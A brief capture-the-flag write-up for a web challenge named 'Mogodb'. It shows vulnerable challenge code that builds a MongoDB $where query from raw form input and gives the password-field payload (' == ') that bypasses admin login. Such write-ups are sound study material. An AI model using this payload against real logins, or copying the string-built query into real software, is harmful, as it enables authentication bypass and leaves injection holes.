Mogodb

web/mogodb (by hmmm) | 355 points

The web-scale DB of the future!

We need to login in the application with admin username, but we dont have a password.

We need to perform a NoSQLi to login without password.

user = db.users.find_one(
	{
	"$where":
		f"this.user === '{request.form['user']}' && this.password === '{request.form['password']}'"
	}
)

I used ' == ' as payload to login as admin. Essentially the query becomes this this.password === '' == ''"

I found This Answer most helpful

Last updated 1 month ago